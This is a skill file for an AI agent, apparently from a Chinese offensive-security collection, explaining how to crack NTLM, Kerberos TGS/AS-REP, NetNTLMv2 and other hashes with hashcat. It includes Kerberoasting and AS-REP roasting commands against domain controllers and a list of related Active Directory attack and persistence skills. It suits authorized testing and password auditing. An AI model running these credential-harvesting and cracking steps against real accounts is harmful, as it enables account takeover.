hashcat-crack

Name: hashcat-crack
Author: wgpsec/AboutSecurity

$npx mdskill add wgpsec/AboutSecurity/hashcat-crack

Crack password hashes offline using GPU-accelerated hashcat.

Recover plaintext passwords from NTLM, Kerberos, or SHA hashes.
Integrates with hashdump, secretsdump, Kerberoast, and AS-REP outputs.
Selects attack mode based on hash type and available wordlists.
Outputs cracked passwords directly to the agent's output channel.

SKILL.md

.github/skills/hashcat-crackView on GitHub ↗

---
name: hashcat-crack
description: "使用 hashcat 进行密码哈希离线破解。当获取到密码哈希（NTLM/NTLMv2/Kerberos TGS/AS-REP/SHA/MD5/bcrypt/NetNTLMv2）需要还原明文密码时使用。hashcat 是 GPU 加速的密码破解工具，比 john 快几十倍。覆盖哈希类型识别、字典攻击、规则攻击、掩码攻击、组合攻击。拿到 hashdump/secretsdump/Kerberoast/AS-REP 输出后必用此技能"
metadata:
  tags: "hashcat,crack,hash,password,ntlm,kerberos,tgs,md5,sha,密码,破解,GPU,john,哈希"
  category: "tool"
---

# hashcat 密码哈希离线破解

hashcat 利用 GPU 加速哈希破解，速度远超 CPU。核心工作流：**识别哈希类型 → 选择攻击模式 → 喂字典/规则/掩码**。

## 哈希类型识别（-m 参数）

| 哈希类型 | -m 值 | 来源 |
|----------|-------|------|
| NTLM | 1000 | hashdump / secretsdump |
| NetNTLMv1 | 5500 | Responder 抓包（旧系统/降级攻击） |
| NetNTLMv2 | 5600 | Responder / ntlmrelayx 抓包 |
| Kerberos TGS (Kerberoast) | 13100 | GetUserSPNs.py |
| Kerberos AS-REP | 18200 | GetNPUsers.py |
| MD5 | 0 | Web 数据库泄露 |
| SHA-256 | 1400 | — |
| SHA-512 | 1800 | Linux /etc/shadow ($6$) |
| bcrypt | 3200 | Web 应用 |
| DCC2 (Domain Cached Credentials 2) | 2100 | secretsdump 域缓存凭据 |
| WPA-PBKDF2 | 22000 | WiFi 握手包 |

## 攻击模式

### 字典攻击（最常用）

```bash
# 基本字典攻击
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

# 加规则（变形字典，如 password → Password1!）
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# 常用规则文件
# best64.rule — 64 条高效规则，速度和效果平衡
# rockyou-30000.rule — 大规则集，覆盖更多变形
# OneRuleToRuleThemAll.rule — 社区最强规则集
```

### 掩码攻击（已知密码模式）

```bash
# 8 位纯数字
hashcat -m 1000 hashes.txt -a 3 ?d?d?d?d?d?d?d?d

# 首字母大写 + 6 位小写 + 1 位数字（如 Password1）
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?l?d

# 掩码字符集：?l=小写 ?u=大写 ?d=数字 ?s=特殊 ?a=全部
```

### 组合攻击

```bash
# 两个字典组合（word1+word2）
hashcat -m 1000 hashes.txt -a 1 dict1.txt dict2.txt
```

## 实战场景

### Kerberoast 破解

```bash
# GetUserSPNs.py 输出 → hashcat
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request -outputfile tgs.txt
hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
```

### AS-REP Roasting 破解

```bash
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP -outputfile asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
```

### NTLM 哈希破解（hashdump/secretsdump）

```bash
# secretsdump 输出格式：user:RID:LM:NTLM:::
# 提取 NTLM 部分
cat secretsdump.txt | awk -F: '{print $4}' | sort -u > ntlm.txt
hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
```

### NetNTLMv2 破解（Responder 抓取）

```bash
hashcat -m 5600 responder_hashes.txt /usr/share/wordlists/rockyou.txt
```

## 实用参数

```bash
# 查看已破解结果
hashcat -m 1000 hashes.txt --show

# 继续中断的任务
hashcat -m 1000 hashes.txt --restore

# 只跑 GPU（不用 CPU）
hashcat -m 1000 hashes.txt -D 2

# 设置工作负载（1=低 2=默认 3=高 4=极限）
hashcat -m 1000 hashes.txt -w 3

# 内核优化（截断密码长度换速度，多数场景够用）
hashcat -m 1000 hashes.txt -O

# 输出到文件
hashcat -m 1000 hashes.txt wordlist.txt -o cracked.txt
```

## 决策树

```
拿到哈希后：
├─ 知道哈希类型 → 直接 hashcat -m 值
├─ 不确定类型 → hashcat --identify hashes.txt 或 hashid
├─ 有 GPU → hashcat（首选）
├─ 无 GPU / CPU 环境 → john the ripper
└─ 在线查询 → hashes.org / crackstation.net（先试再跑）
```

More from wgpsec/AboutSecurity

Skill	Description
401-403-bypass	401/403 访问拒绝绕过方法论。当遇到管理后台、API 端点返回 401/403 Forbidden 时使用。覆盖路径操纵、HTTP 方法篡改、Header 注入、协议降级、组合攻击
ad-acl-abuse	Active Directory ACL 滥用攻击方法论。当 BloodHound 发现 GenericAll/WriteDACL/WriteOwner/GenericWrite/ForceChangePassword 等危险 ACE 时使用。覆盖 ACE 枚举、权限滥用链、Shadow Credentials、RBCD 攻击
ad-delegation-attack	Kerberos 委派攻击（非约束/约束/RBCD）。当 BloodHound 发现委派配置、或已获取有 SPN 的服务账号/机器账号控制权时使用。通过 S4U 协议滥用可实现跨服务模拟任意用户，常用于域内权限提升和横向移动。
ad-domain-attack	Active Directory 域环境攻击全链路。当目标主机在域环境中（systeminfo 显示 Domain 非 WORKGROUP）、发现 88/389/636 端口、或获取到域用户凭据时使用。覆盖域信息收集、用户枚举、Kerberoasting、AS-REP Roasting、委派攻击、ACL 滥用、DCSync、Golden/Silver Ticket
ad-persistence	AD 域环境持久化技术。当已获取域管/本地管理员权限、需要建立持久访问以确保重启或密码更改后仍能回到目标环境时使用。覆盖主机级持久化（计划任务/注册表Run/COM劫持/WMI事件订阅/Windows服务/启动文件夹）、域级持久化（Golden Ticket/Silver Ticket/Skeleton Key/DSRM/AdminSDHolder）、DCShadow/GoldenGMSA高级技术、清理命令与检测规避
ad-trust-attack	域信任关系攻击。当目标存在多域/多林环境时使用。包含父子域提权（Golden Ticket + ExtraSid）、跨林攻击（SID History/MSSQL Trust Links）、单向信任利用。已获取子域 Domain Admin 或发现信任关系时优先加载。
adcs-certipy-attack	Active Directory Certificate Services (ADCS) 证书攻击。当发现域内有 CA 服务器、ADCS Web Enrollment、证书模板配置错误时使用。覆盖 ESC1-ESC11 所有证书滥用路径、Certipy 工具链、证书伪造、NTLM 中继到 ADCS。发现 ADCS/CA/证书/certsrv 相关内容时一定要使用此技能
adinfo-enum	使用 Adinfo 进行 Active Directory 信息收集。当获得域用户凭据后需要快速收集域环境信息时使用。Adinfo 是一个快速 AD 信息收集工具，一条命令输出域控列表、域管用户、信任关系、GPO、SPN、委派配置等关键信息——比手动 LDAP 查询快得多。发现域环境后第一步信息收集使用此技能
agent-security	\|
ai-data-security	\|